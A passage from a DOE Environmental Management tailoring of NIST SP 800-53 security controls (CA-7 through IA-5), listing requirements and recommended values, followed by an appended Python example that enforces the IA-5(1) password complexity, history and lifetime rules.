  NIST requirement: Correlation and analysis of security-related information generated by assessments and monitoring;

CA-7 f. Continuous Monitoring
  NIST requirement: Response actions to address results of the analysis of security-related information; and
CA-7 g. Continuous Monitoring
  NIST requirement: Reporting the security status of the organization and the information system to [Assignment: organization-defined personnel or roles] [Assignment: organization-defined frequency].
  Recommended value: AODR & AO annually as part of CM process

CA-7(1) Continuous Monitoring
  NIST requirement: The organization employs assessors or assessment teams with [Assignment: organization-defined level of independence] to monitor the security controls in the information system on an ongoing basis.
  EM supplemental guidance: This is performed as a service by EM HQ.

CA-9 a. Internal System Connections
  NIST requirement: The organization: Authorizes internal connections of [Assignment: organization-defined information system components or classes of components] to the information system; and

CA-9 b. Internal System Connections
  NIST requirement: The organization: Documents, for each internal connection, the interface characteristics, security requirements, and the nature of the information communicated.

CM-1 a.1. Configuration Management Policy and Procedures
  NIST requirement: The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A configuration management policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
  Recommended value: Security Staff and Administrative Staff
CM-1 a.2. Configuration Management Policy and Procedures
  NIST requirement: The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the configuration management policy and associated configuration management controls; and
  Recommended value: Security Staff and Administrative Staff

CM-1 b.1. Configuration Management Policy and Procedures
  NIST requirement: Reviews and updates the current: Configuration management policy [Assignment: organization-defined frequency]; and
  Recommended value: Annually or any time there is a major change

CM-1 b.2. Configuration Management Policy and Procedures
  NIST requirement: Reviews and updates the current: Configuration management procedures [Assignment: organization-defined frequency].
  Recommended value: Annually or any time there is a major change

CM-2 Configuration Baseline
  NIST requirement: The organization develops, documents, and maintains under configuration control, a current baseline configuration of the information system.
  EM supplemental guidance: This control establishes a baseline configuration for the information system and its constituent components including communications and connectivity-related aspects of the system. The baseline configuration provides information about the components of an information system (e.g., the standard software load for a workstation, server, network component, or mobile device including operating system/installed applications with current version numbers and patch information), network topology, and the logical placement of the component within the system architecture.

CM-2(1)(a) Configuration Baseline
  NIST requirement: The organization reviews and updates the baseline configuration of the information system: [Assignment: organization-defined frequency];
  Recommended value: As needed or at least annually
CM-2(1)(b) Configuration Baseline
  NIST requirement: The organization reviews and updates the baseline configuration of the information system: When required due to [Assignment: organization-defined circumstances]; and
  Recommended value: Annually or any time there is a major change

CM-2(1)(c) Configuration Baseline
  NIST requirement: The organization reviews and updates the baseline configuration of the information system: As an integral part of information system component installations and upgrades.

CM-2(3) Configuration Baseline
  NIST requirement: The organization retains [Assignment: organization-defined previous versions of baseline configurations of the information system] to support rollback.
  Recommended value: Two versions

CM-2(7)(a) Configuration Baseline
  NIST requirement: The organization: Issues [Assignment: organization-defined information systems, system components, or devices] with [Assignment: organization-defined configurations] to individuals traveling to locations that the organization deems to be of significant risk; and
  EM supplemental guidance: The suggestion here is to have a cache of mobile devices that would be used on foreign travel. The devices would be cleaned prior to and after travel so that no malware would remain if placed on the device while on travel. Also, digital imaging should be used in order to determine if the device was physically altered. The DOE Safe Passage Program is available to EM sites.

CM-2(7)(b) Configuration Baseline
  NIST requirement: The organization: Applies [Assignment: organization-defined security safeguards] to the devices when the individuals return.
CM-3 a. Configuration Change Control
  NIST requirement: The organization: Determines the types of changes to the information system that are configuration-controlled;
  EM supplemental guidance: The site determines the types of changes to the information system that are configuration controlled. Configuration change control for the information system involves the systematic proposal, justification, implementation, test/evaluation, review, and disposition of changes to the system, including upgrades and modifications.

CM-3 b. Configuration Change Control
  NIST requirement: The organization: Reviews proposed configuration-controlled changes to the information system and approves or disapproves such changes with explicit consideration for security impact analyses;

CM-3 c. Configuration Change Control
  NIST requirement: The organization: Documents configuration change decisions associated with the information system;

CM-3 d. Configuration Change Control
  NIST requirement: The organization: Implements approved configuration-controlled changes to the information system;

CM-3 e. Configuration Change Control
  NIST requirement: The organization: Retains records of configuration-controlled changes to the information system for [Assignment: organization-defined time period];

CM-3 f. Configuration Change Control
  NIST requirement: The organization: Audits and reviews activities associated with configuration-controlled changes to the information system; and
CM-3 g. Configuration Change Control
  NIST requirement: The organization: Coordinates and provides oversight for configuration change control activities through [Assignment: organization-defined configuration change control element (e.g., committee, board)] that convenes [Selection (one or more): [Assignment: organization-defined frequency]; [Assignment: organization-defined configuration change conditions]].
  Recommended value: A change control board that convenes at least monthly or more frequently if needed to review and approve/disapprove changes

CM-3(2) Configuration Change Control
  NIST requirement: The organization tests, validates, and documents changes to the information system before implementing the changes on the operational system.

CM-4 Security Impact Analyses
  NIST requirement: The organization analyzes changes to the information system to determine potential security impacts prior to change implementation.
  EM supplemental guidance: Security impact analysis may include, for example, reviewing information system documentation such as the security plan to understand how specific security controls are implemented within the system and how the changes might affect the controls. Security impact analysis may also include an assessment of risk to understand the impact of the changes and to determine if additional security controls are required. Security impact analysis is scaled in accordance with the security categorization of the information system.

CM-5 Access Restrictions for Change
  NIST requirement: The organization defines, documents, approves, and enforces physical and logical access restrictions associated with changes to the information system.
CM-6 a. Configuration Settings
  NIST requirement: The organization: Establishes and documents configuration settings for information technology products employed within the information system using [Assignment: organization-defined security configuration checklists] that reflect the most restrictive mode consistent with operational requirements;
  Recommended value: Baseline checklist such as USGCB, SCAP, or CIS for its different kinds of systems
  EM supplemental guidance: Configuration settings are the configurable security-related parameters of information technology products that are part of the information system. Security-related parameters are those parameters impacting the security state of the system including parameters related to meeting other security control requirements. Security-related parameters include, for example, registry settings; account, file, and directory settings (i.e., permissions); and settings for services, ports, protocols, and remote connections.

CM-6 b. Configuration Settings
  NIST requirement: The organization: Implements the configuration settings;

CM-6 c. Configuration Settings
  NIST requirement: The organization: Identifies, documents, and approves any deviations from established configuration settings for [Assignment: organization-defined information system components] based on [Assignment: organization-defined operational requirements]; and

CM-6 d. Configuration Settings
  NIST requirement: The organization: Monitors and controls changes to the configuration settings in accordance with organizational policies and procedures.

CM-7 a. Least Functionality
  NIST requirement: The organization: Configures the information system to provide only essential capabilities; and
CM-7 b. Least Functionality
  NIST requirement: The organization: Prohibits or restricts the use of the following functions, ports, protocols, and/or services: [Assignment: organization-defined prohibited or restricted functions, ports, protocols, and/or services].
  Recommended value: Any function, port, protocol or service not specifically required for the operation of the information system and those specifically prohibited by the AO
  EM supplemental guidance: The functions and services provided by organizational information systems, or individual components of information systems, are carefully reviewed to determine which functions and services are candidates for elimination (e.g., Voice Over Internet Protocol, Instant Messaging, auto-execute, file sharing). Organizations consider disabling unused or unnecessary physical and logical ports and protocols (e.g., Universal Serial Bus [USB], File Transfer Protocol [FTP], Internet Protocol Version 6 [IPv6], Hyper Text Transfer Protocol [HTTP]) on information system components to prevent unauthorized connection of devices, unauthorized transfer of information, or unauthorized tunneling. Organizations can utilize network scanning tools, intrusion detection and prevention systems, and end-point protections such as firewalls and host-based intrusion detection systems to identify and prevent the use of prohibited functions, ports, protocols, and services.

CM-7(1)(a) Least Functionality
  NIST requirement: The organization: Reviews the information system [Assignment: organization-defined frequency] to identify unnecessary and/or non-secure functions, ports, protocols, and services; and
  Recommended value: Annually
CM-7(1)(b) Least Functionality
  NIST requirement: The organization: Disables [Assignment: organization-defined functions, ports, protocols, and services within the information system deemed to be unnecessary and/or non-secure].
  Recommended value: Disable all that are not necessary.

CM-7(2) Least Functionality
  NIST requirement: The information system prevents program execution in accordance with [Selection (one or more): [Assignment: organization-defined policies regarding software program usage and restrictions]; rules authorizing the terms and conditions of software program usage].

CM-7(4)(a) Least Functionality
  NIST requirement: The organization: Identifies [Assignment: organization-defined software programs not authorized to execute on the information system];

CM-7(4)(b) Least Functionality
  NIST requirement: The organization: Employs an allow-all, deny-by-exception policy to prohibit the execution of unauthorized software programs on the information system; and

CM-7(4)(c) Least Functionality
  NIST requirement: The organization: Reviews and updates the list of unauthorized software programs [Assignment: organization-defined frequency].
  Recommended value: Annually

CM-8 a.1. Information System Component Inventory
  NIST requirement: The organization: Develops and documents an inventory of information system components that: Accurately reflects the current information system;
CM-8 a.2. Information System Component Inventory
  NIST requirement: The organization: Develops and documents an inventory of information system components that: Includes all components within the authorization boundary of the information system;
  EM supplemental guidance: This function should be automated and the SSP control statement should point to the system (e.g., Tenable Security Center).

CM-8 a.3. Information System Component Inventory
  NIST requirement: The organization: Develops and documents an inventory of information system components that: Is at the level of granularity deemed necessary for tracking and reporting; and
  EM supplemental guidance: This function should be automated and the SSP control statement should point to the system (e.g., Tenable Security Center).

CM-8 a.4. Information System Component Inventory
  NIST requirement: The organization: Develops and documents an inventory of information system components that: Includes [Assignment: organization-defined information deemed necessary to achieve effective information system component accountability]; and
  Recommended value: Device type, model, serial number or tracking number, location, and owner name and phone number

CM-8 b. Information System Component Inventory
  NIST requirement: The organization: Reviews and updates the information system component inventory [Assignment: organization-defined frequency].

CM-8(1) Information System Component Inventory
  NIST requirement: The organization updates the inventory of information system components as an integral part of component installations, removals, and information system updates.

CM-8(3)(a) Information System Component Inventory
  NIST requirement: The organization: Employs automated mechanisms [Assignment: organization-defined frequency] to detect the presence of unauthorized hardware, software, and firmware components within the information system; and
CM-8(3)(b) Information System Component Inventory
  NIST requirement: The organization: Takes the following actions when unauthorized components are detected: [Selection (one or more): disables network access by such components; isolates the components; notifies [Assignment: organization-defined personnel or roles]].

CM-8(5) Information System Component Inventory
  NIST requirement: The organization verifies that all components within the authorization boundary of the information system are not duplicated in other information system inventories.

CM-9 a. Configuration Management Plan
  NIST requirement: The organization develops, documents, and implements a configuration management plan for the information system that: Addresses roles, responsibilities, and configuration management processes and procedures;
  EM supplemental guidance: The configuration management plan satisfies the requirements in the organization's configuration management policy while being tailored to the individual information system. The configuration management plan defines detailed processes and procedures for how configuration management is used to support system development life cycle activities at the information system level. The plan describes how to move a change through the change management process, how configuration settings and configuration baselines are updated, how the information system component inventory is maintained, how development, test, and operational environments are controlled, and finally, how documents are developed, released, and updated.
CM-9 b. Configuration Management Plan
  NIST requirement: The organization develops, documents, and implements a configuration management plan for the information system that: Establishes a process for identifying configuration items throughout the system development life cycle and for managing the configuration of the configuration items;

CM-9 c. Configuration Management Plan
  NIST requirement: The organization develops, documents, and implements a configuration management plan for the information system that: Defines the configuration items for the information system and places the configuration items under configuration management; and

CM-9 d. Configuration Management Plan
  NIST requirement: The organization develops, documents, and implements a configuration management plan for the information system that: Protects the configuration management plan from unauthorized disclosure and modification.

CM-10 a. Software Usage Restrictions
  NIST requirement: The organization: Uses software and associated documentation in accordance with contract agreements and copyright laws;

CM-10 b. Software Usage Restrictions
  NIST requirement: The organization: Tracks the use of software and associated documentation protected by quantity licenses to control copying and distribution; and
CM-10 c. Software Usage Restrictions
  NIST requirement: The organization: Controls and documents the use of peer-to-peer file sharing technology to ensure that this capability is not used for the unauthorized distribution, display, performance, or reproduction of copyrighted work.

CM-11 a. User-Installed Software
  NIST requirement: The organization: Establishes [Assignment: organization-defined policies] governing the installation of software by users;

CM-11 b. User-Installed Software
  NIST requirement: The organization: Enforces software installation policies through [Assignment: organization-defined methods]; and

CM-11 c. User-Installed Software
  NIST requirement: The organization: Monitors policy compliance at [Assignment: organization-defined frequency].

CP-1 a.1. Contingency Planning Policy and Procedures
  NIST requirement: The organization develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A contingency planning policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
  Recommended value: Security Staff and Administrative Staff

CP-1 a.2. Contingency Planning Policy and Procedures
  NIST requirement: The organization develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the contingency planning policy and associated contingency planning controls; and
  Recommended value: Security Staff and Administrative Staff
CP-1 0 b 1 - Contingency Planning Policy and Procedures
  NIST Control Requirement: The organization Reviews and updates the current Contingency planning policy [Assignment: organization-defined frequency]; and
  Recommended organizationally defined values: Annually or any time there is a major change
CP-1 1 b 2 - Contingency Planning Policy and Procedures
  NIST Control Requirement: The organization Reviews and updates the current Contingency planning procedures [Assignment: organization-defined frequency].
  Recommended organizationally defined values: Annually or any time there is a major change
CP-2 0 a 1 - Contingency Plan
  NIST Control Requirement: The Organization develops a contingency plan for the information system that Identifies essential missions and business functions and associated contingency requirements;
CP-2 0 a 2 - Contingency Plan
  NIST Control Requirement: The Organization develops a contingency plan for the information system that Provides recovery objectives, restoration priorities, and metrics;
CP-2 0 a 3 - Contingency Plan
  NIST Control Requirement: Addresses contingency roles, responsibilities, assigned individuals with contact information;
CP-2 0 a 4 - Contingency Plan
  NIST Control Requirement: The Organization develops a contingency plan for the information system that Addresses maintaining essential missions and business functions despite an information system disruption, compromise, or failure;
CP-2 0 a 5 - Contingency Plan
  NIST Control Requirement: The Organization develops a contingency plan for the information system that Addresses eventual, full information system restoration without deterioration of the security measures originally planned and implemented; and
CP-2 0 a 6 - Contingency Plan
  NIST Control Requirement: The Organization develops a contingency plan for the information system that Is reviewed and approved by designated officials within the organization;
CP-2 0 b - Contingency Plan
  NIST Control Requirement: The organization distributes copies of the contingency plan to [Assignment: organization-defined list of key contingency personnel (identified by name and/or by role) and organizational elements];
  Recommended organizationally defined values: System owner, business function, AODR, ISSM, ISSO, system admins and physical security.
CP-2 0 c - Contingency Plan
  NIST Control Requirement: The Organization coordinates contingency planning activities with incident handling activities;
CP-2 0 d - Contingency Plan
  NIST Control Requirement: The organization reviews the contingency plan for the information system [Assignment: organization-defined frequency];
  Recommended organizationally defined values: Annually
CP-2 0 e - Contingency Plan
  NIST Control Requirement: The organization updates the contingency plan to address changes to the organization, information system, or environment of operation and problems encountered during contingency plan implementation, execution, or testing;
CP-2 0 f - Contingency Plan
  NIST Control Requirement: The organization communicates contingency plan changes to [Assignment: organization-defined key contingency personnel (identified by name and/or by role) and organizational elements]; and
  Recommended organizationally defined values: System owner, business function, AODR, ISSM, ISSO, system admins and physical security.
CP-2 0 g - Contingency Plan
  NIST Control Requirement: The organization protects the contingency plan from unauthorized disclosure and modification.
CP-2 1 - Contingency Plan
  NIST Control Requirement: The organization coordinates contingency plan development with organizational elements responsible for related plans.
CP-2 3 - Contingency Plan
  NIST Control Requirement: The organization plans for the resumption of essential missions and business functions within [Assignment: organization-defined time period] of contingency plan activation.
CP-2 8 - Contingency Plan
  NIST Control Requirement: The organization identifies critical information system assets supporting essential missions and business functions.
CP-3 0 a - Contingency Training
  NIST Control Requirement: The organization provides contingency training to information system users consistent with assigned roles and responsibilities: Within [Assignment: organization-defined time period] of assuming a contingency role or responsibility;
CP-3 0 b - Contingency Training
  NIST Control Requirement: The organization provides contingency training to information system users consistent with assigned roles and responsibilities: When required by information system changes; and
CP-3 0 c - Contingency Training
  NIST Control Requirement: The organization provides contingency training to information system users consistent with assigned roles and responsibilities: [Assignment: organization-defined frequency] thereafter.
  Recommended organizationally defined values: Annually
CP-4 0 a - Contingency Plan Testing
  NIST Control Requirement: The Organization Tests the contingency plan for the information system [Assignment: organization-defined frequency] using [Assignment: organization-defined tests] to determine the effectiveness of the plan and the organizational readiness to execute the plan;
  Recommended organizationally defined values: The CP is tested annually by table top exercises one year and simulated/live exercise every other year for effectiveness and ability to meet contingencies
  EM Supplemental Guidance: There are several methods for testing and/or exercising contingency plans to identify potential weaknesses (e.g., checklist, walk-through/tabletop, simulation: parallel, full interrupt). Contingency plan testing and/or exercises include a determination of the effects on site operations and assets (e.g., reduction in mission capability) and individuals arising due to contingency operations in accordance with the plan.
CP-4 0 b - Contingency Plan Testing
  NIST Control Requirement: The organization Reviews the contingency plan test results; and
CP-4 1 c - Contingency Plan Testing
  NIST Control Requirement: The organization Initiates corrective actions, if needed.
CP-4 1 - Contingency Plan Testing
  NIST Control Requirement: The organization coordinates contingency plan testing with organizational elements responsible for related plans.
CP-6 0 a - Alternate Storage Site
  NIST Control Requirement: The organization establishes an alternate storage site including necessary agreements to permit the storage and retrieval of information system backup information; and
CP-6 0 b - Alternate Storage Site
  NIST Control Requirement: The organization ensures that the alternate storage site provides information security safeguards equivalent to that of the primary site.
CP-6 1 - Alternate Storage Site
  NIST Control Requirement: The organization identifies an alternate storage site that is separated from the primary storage site to reduce susceptibility to the same threats.
CP-6 3 - Alternate Storage Site
  NIST Control Requirement: The organization identifies potential accessibility problems to the alternate storage site in the event of an area-wide disruption or disaster and outlines explicit mitigation actions.
CP-7 0 a - Alternate Processing Site
  NIST Control Requirement: The organization establishes an alternate processing site including necessary agreements to permit the transfer and resumption of [Assignment: organization-defined information system operations] for essential missions/business functions within [Assignment: organization-defined time period consistent with recovery time and recovery point objectives] when the primary processing capabilities are unavailable;
  EM Supplemental Guidance: The site has developed an alternate processing site that is approved (through agreements) and that allows the site to meet the mission requirements (one day recommended)
CP-7 0 b - Alternate Processing Site
  NIST Control Requirement: The organization ensures that equipment and supplies required to transfer and resume operations are available at the alternate processing site or contracts are in place to support delivery to the site within the organization-defined time period for transfer/resumption; and
CP-7 0 c - Alternate Processing Site
  NIST Control Requirement: The organization ensures that the alternate processing site provides information security safeguards equivalent to that of the primary site.
CP-7 1 - Alternate Processing Site
  NIST Control Requirement: The organization identifies an alternate processing site that is separated from the primary processing site to reduce susceptibility to the same threats.
CP-7 2 - Alternate Processing Site
  NIST Control Requirement: The organization identifies potential accessibility problems to the alternate processing site in the event of an area-wide disruption or disaster and outlines explicit mitigation actions.
CP-7 3 - Alternate Processing Site
  NIST Control Requirement: The organization develops alternate processing site agreements that contain priority-of-service provisions in accordance with organizational availability requirements (including recovery time objectives).
CP-8 0 - Telecommunications Services
  NIST Control Requirement: The organization establishes alternate telecommunications services including necessary agreements to permit the resumption of [Assignment: organization-defined information system operations] for essential missions and business functions within [Assignment: organization-defined time period] when the primary telecommunications capabilities are unavailable at either the primary or alternate processing or storage sites.
  EM Supplemental Guidance: The site establishes alternate telecommunications services agreements to meet the mission restoration requirements (in accordance with BIA) (Recommend one business day maximum)
CP-8 1 a - Telecommunications Services
  NIST Control Requirement: The organization develops primary and alternate telecommunications service agreements that contain priority-of-service provisions in accordance with organizational availability requirements (including recovery time objectives); and
CP-8 1 b - Telecommunications Services
  NIST Control Requirement: The organization requests Telecommunications Service Priority for all telecommunications services used for national security emergency preparedness in the event that the primary and/or alternate telecommunications services are provided by a common carrier.
CP-8 2 - Telecommunications Services
  NIST Control Requirement: The organization obtains alternate telecommunications services to reduce the likelihood of sharing a single point of failure with primary telecommunications services.
CP-9 0 a - Information System Backup
  NIST Control Requirement: The organization conducts backups of user-level information contained in the information system [Assignment: organization-defined frequency consistent with recovery time and recovery point objectives];
  Recommended organizationally defined values: Daily
CP-9 0 b - Information System Backup
  NIST Control Requirement: The organization conducts backups of system-level information contained in the information system [Assignment: organization-defined frequency consistent with recovery time and recovery point objectives];
CP-9 0 c - Information System Backup
  NIST Control Requirement: The organization conducts backups of information system documentation including security-related documentation [Assignment: organization-defined frequency consistent with recovery time and recovery point objectives]; and
CP-9 0 d - Information System Backup
  NIST Control Requirement: The organization protects the confidentiality and integrity of backup information at the storage location.
CP-9 1 - Information System Backup
  NIST Control Requirement: The organization tests backup information [Assignment: organization-defined frequency] to verify media reliability and information integrity.
  Recommended organizationally defined values: At least annually
CP-10 0 - Information System Recovery and Reconstitution
  NIST Control Requirement: The organization provides for the recovery and reconstitution of the information system to a known state after a disruption, compromise, or failure.
CP-10 2 - Information System Recovery and Reconstitution
  NIST Control Requirement: The information system implements transaction recovery for systems that are transaction-based.
IA-1 0 a 1 - Identification and Authentication Policy and Procedures
  NIST Control Requirement: The organization: develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: An identification and authentication policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
  Recommended organizationally defined values: Security Staff and Administrative Staff
IA-1 0 a 2 - Identification and Authentication Policy and Procedures
  NIST Control Requirement: The organization: develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the identification and authentication policy and associated identification and authentication controls; and
  Recommended organizationally defined values: Security Staff and Administrative Staff
IA-1 0 b 1 - Identification and Authentication Policy and Procedures
  NIST Control Requirement: The organization reviews and updates the current: Identification and authentication policy [Assignment: organization-defined frequency]; and
  Recommended organizationally defined values: Annually or any time there is a major change
IA-1 0 b 2 - Identification and Authentication Policy and Procedures
  NIST Control Requirement: The organization reviews and updates the current: Identification and authentication procedures [Assignment: organization-defined frequency].
  Recommended organizationally defined values: Annually or any time there is a major change
IA-2 0 - Identification and Authentication (Organizational Users)
  NIST Control Requirement: The information system uniquely identifies and authenticates organizational users (or processes acting on behalf of organizational users).
IA-2 1 - Identification and Authentication (Organizational Users)
  NIST Control Requirement: The information system implements multifactor authentication for network access to privileged accounts.
IA-2 2 - Identification and Authentication (Organizational Users)
  NIST Control Requirement: The information system implements multifactor authentication for network access to non-privileged accounts.
IA-2 3 - Identification and Authentication (Organizational Users)
  NIST Control Requirement: The information system implements multifactor authentication for local access to privileged accounts.
IA-2 8 - Identification and Authentication (Organizational Users)
  NIST Control Requirement: The information system implements replay-resistant authentication mechanisms for network access to privileged accounts.
IA-2 11 - Identification and Authentication (Organizational Users)
  NIST Control Requirement: The information system implements multifactor authentication for remote access to privileged and non-privileged accounts such that one of the factors is provided by a device separate from the system gaining access and the device meets [Assignment: organization-defined strength of mechanism requirements].
IA-2 12 - Identification and Authentication (Organizational Users)
  NIST Control Requirement: The information system accepts and electronically verifies Personal Identity Verification (PIV) credentials.
IA-3 0 - Device Identification and Authentication
  NIST Control Requirement: The information system uniquely identifies and authenticates [Assignment: organization defined specific and/or types of devices] before establishing a [Selection (one or more): local; remote; network] connection.
  Recommended organizationally defined values: Single use authenticators before establishing a remote connection
IA-4 0 a - Identifier Management
  NIST Control Requirement: The organization manages information system identifiers by: Receiving authorization from [Assignment: organization-defined personnel or roles] to assign an individual, group, role, or device identifier;
  Recommended organizationally defined values: All personnel
IA-4 0 b - Identifier Management
  NIST Control Requirement: The organization manages information system identifiers by: Selecting an identifier that identifies an individual, group, role, or device;
IA-4 0 c - Identifier Management
  NIST Control Requirement: The organization manages information system identifiers by: Assigning the identifier to the intended individual, group, role, or device;
IA-4 0 d - Identifier Management
  NIST Control Requirement: The organization manages information system identifiers by: Preventing reuse of identifiers for [Assignment: organization-defined time period]; and
IA-4 0 e - Identifier Management
  NIST Control Requirement: The organization manages information system identifiers by: Disabling the identifier after [Assignment: organization-defined time period of inactivity].
  Recommended organizationally defined values: 90 days
IA-5 0 a - Authenticator Management
  NIST Control Requirement: The organization manages information system authenticators by: Verifying, as part of the initial authenticator distribution, the identity of the individual, group, role, or device receiving the authenticator;
IA-5 0 b - Authenticator Management
  NIST Control Requirement: The organization manages information system authenticators by: Establishing initial authenticator content for authenticators defined by the organization;
IA-5 0 c - Authenticator Management
  NIST Control Requirement: The organization manages information system authenticators by: Ensuring that authenticators have sufficient strength of mechanism for their intended use;
IA-5 0 d - Authenticator Management
  NIST Control Requirement: The organization manages information system authenticators by: Establishing and implementing administrative procedures for initial authenticator distribution, for lost/compromised or damaged authenticators, and for revoking authenticators;
IA-5 0 e - Authenticator Management
  NIST Control Requirement: The organization manages information system authenticators by: Changing default content of authenticators prior to information system installation
IA-5 0 f - Authenticator Management
  NIST Control Requirement: The organization manages information system authenticators by: Establishing minimum and maximum lifetime restrictions and reuse conditions for authenticators;
IA-5 0 g - Authenticator Management
  NIST Control Requirement: The organization manages information system authenticators by: Changing/refreshing authenticators [Assignment: organization-defined time period by authenticator type];
  EM Supplemental Guidance: If passwords are still used the recommended time to force a change is 90 days or less. If multifactor is used the pin can be changed every 6 months.
IA-5 0 h - Authenticator Management
  NIST Control Requirement: The organization manages information system authenticators by: Protecting authenticator content from unauthorized disclosure and modification;
IA-5 0 i - Authenticator Management
  NIST Control Requirement: The organization manages information system authenticators by: Requiring individuals to take, and having devices implement, specific security safeguards to protect authenticators; and
IA-5 0 j - Authenticator Management
  NIST Control Requirement: The organization manages information system authenticators by: Changing authenticators for group/role accounts when membership to those accounts changes
IA-5 1 a - Authenticator Management
  NIST Control Requirement: The information system, for password-based authentication: Enforces minimum password complexity of [Assignment: organization-defined requirements for case sensitivity, number of characters, mix of upper-case letters, lower-case letters, numbers, and special characters, including minimum requirements for each type];
  Recommended organizationally defined values: At least sixteen characters, at least sixteen nonblank characters, combination of letters, numbers, and at least one special character in the first seven positions, do not contain user ID, no simple pattern of letters or numbers
IA-5 1 b - Authenticator Management
  NIST Control Requirement: The information system, for password-based authentication: Enforces at least the following number of changed characters when new passwords are created: [Assignment: organization-defined number];
  Recommended organizationally defined values: At least 4 characters
IA-5 1 c - Authenticator Management
  NIST Control Requirement: The information system, for password-based authentication: Stores and transmits only encrypted representations of passwords;
IA-5 1 d - Authenticator Management
  NIST Control Requirement: The information system, for password-based authentication: Enforces password minimum and maximum lifetime restrictions of [Assignment: organization defined numbers for lifetime minimum, lifetime maximum];
  Recommended organizationally defined values: Minimum of one day, maximum of 90 days
IA-5 1 e - Authenticator Management
  NIST Control Requirement: The information system, for password-based authentication: Prohibits password reuse for [Assignment: organization-defined number] generations; and
  Recommended organizationally defined values: 24
IA-5 1 f - Authenticator Management
  NIST Control Requirement: The information system, for password-based authentication: Allows the use of a temporary password for system logons with an immediate change to a permanent password.
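The IA-5(1) rows above give concrete recommended values but no indication of how a system would enforce them. The following is an added example (not part of the DOE EM RMAIP and not code from any DOE or EM system) that turns the IA-5(1) a, b, c, d and e values into a checkable password-change routine: sixteen nonblank characters, letters plus numbers, a special character in the first seven positions, no user ID, no simple pattern, at least 4 changed characters, no reuse within 24 generations, and a one-day minimum / 90-day maximum lifetime, with only salted PBKDF2 digests kept for the history check. The "simple pattern" heuristic, the position-wise interpretation of "changed characters", the sample account `jdoe`, the sample passwords and every function name are this example's own assumptions.

```python
"""Enforcing the EM-recommended IA-5(1) password values (added example, not
from the DOE EM RMAIP). All names, the pattern heuristic and the sample
account are assumptions made for illustration."""
from __future__ import annotations

import hashlib
import hmac
import os
import string
from dataclasses import dataclass, field
from datetime import datetime, timedelta

MIN_NONBLANK = 16                   # IA-5(1)(a): at least sixteen nonblank characters
SPECIAL_WINDOW = 7                  # IA-5(1)(a): a special character in the first seven positions
MIN_CHANGED = 4                     # IA-5(1)(b): at least 4 characters changed
MIN_LIFETIME = timedelta(days=1)    # IA-5(1)(d): minimum lifetime
MAX_LIFETIME = timedelta(days=90)   # IA-5(1)(d): maximum lifetime
HISTORY_GENERATIONS = 24            # IA-5(1)(e): no reuse for 24 generations
SPECIALS = set(string.punctuation)


def _is_simple_pattern(pw: str) -> bool:
    """Assumed heuristic for 'no simple pattern': one repeated character, or a
    straight ascending/descending run of code points ('abcd...', '4321...')."""
    if len(set(pw)) <= 1:
        return True
    steps = {ord(b) - ord(a) for a, b in zip(pw, pw[1:])}
    return steps == {1} or steps == {-1}


def complexity_violations(pw: str, user_id: str) -> list[str]:
    """IA-5(1)(a) checks; an empty list means the candidate is acceptable."""
    problems: list[str] = []
    if sum(1 for c in pw if not c.isspace()) < MIN_NONBLANK:
        problems.append("fewer than sixteen nonblank characters")
    if not (any(c.isalpha() for c in pw) and any(c.isdigit() for c in pw)):
        problems.append("must combine letters and numbers")
    if not any(c in SPECIALS for c in pw[:SPECIAL_WINDOW]):
        problems.append("no special character in the first seven positions")
    if user_id and user_id.lower() in pw.lower():
        problems.append("contains the user ID")
    if _is_simple_pattern(pw):
        problems.append("simple pattern of letters or numbers")
    return problems


def changed_characters(old: str, new: str) -> int:
    """IA-5(1)(b): positions that differ plus any change in length (assumed
    interpretation of 'changed characters')."""
    return sum(a != b for a, b in zip(old, new)) + abs(len(old) - len(new))


def _digest(pw: str, salt: bytes) -> bytes:
    # IA-5(1)(c): only a salted, slow hash of the password is ever stored.
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 100_000)


@dataclass
class PasswordRecord:
    """Per-account state: (salt, digest) pairs oldest first, and last change time."""
    user_id: str
    history: list[tuple[bytes, bytes]] = field(default_factory=list)
    last_changed: datetime | None = None

    def reused(self, pw: str) -> bool:
        """IA-5(1)(e): true if pw matches any of the last 24 generations."""
        return any(hmac.compare_digest(_digest(pw, salt), digest)
                   for salt, digest in self.history[-HISTORY_GENERATIONS:])


def change_password(rec: PasswordRecord, old: str, new: str, now: datetime) -> list[str]:
    """Apply every IA-5(1) rule; the change is committed only if none fails."""
    problems = complexity_violations(new, rec.user_id)
    if changed_characters(old, new) < MIN_CHANGED:
        problems.append("fewer than 4 characters changed")
    if rec.reused(new):
        problems.append("reused within the last 24 generations")
    if rec.last_changed is not None and now - rec.last_changed < MIN_LIFETIME:
        problems.append("minimum lifetime of one day not reached")
    if not problems:
        salt = os.urandom(16)
        rec.history.append((salt, _digest(new, salt)))
        rec.last_changed = now
    return problems


def password_expired(rec: PasswordRecord, now: datetime) -> bool:
    """IA-5(1)(d): a change is forced once the 90-day maximum lifetime passes."""
    return rec.last_changed is None or now - rec.last_changed > MAX_LIFETIME


def demo() -> dict[str, object]:
    """Walk one constructed account (user 'jdoe', sample passwords) through an
    initial set, a reuse attempt, a too-early change and the expiry check."""
    rec = PasswordRecord("jdoe")
    t0 = datetime(2024, 1, 1)
    first = "Tr!ee-House-2024-Sunrise"
    return {
        "initial": change_password(rec, "", first, t0),
        "reuse": change_password(rec, first, first, t0 + timedelta(days=2)),
        "too_soon": change_password(rec, first, "Ok!ay-Other-Pass-2025-x", t0 + timedelta(hours=3)),
        "expired_day_89": password_expired(rec, t0 + timedelta(days=89)),
        "expired_day_91": password_expired(rec, t0 + timedelta(days=91)),
    }
```

Calling `demo()` returns an empty problem list for the initial set, two problems for the verbatim reuse (too few changed characters and a history hit), one problem for the change attempted three hours later (minimum lifetime), and `False`/`True` for the expiry check on days 89 and 91. Because the history holds only salted digests, the reuse check never needs the old plaintexts, which is what IA-5(1)(c) asks for; the old password is compared only at change time, when the user has just supplied it.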
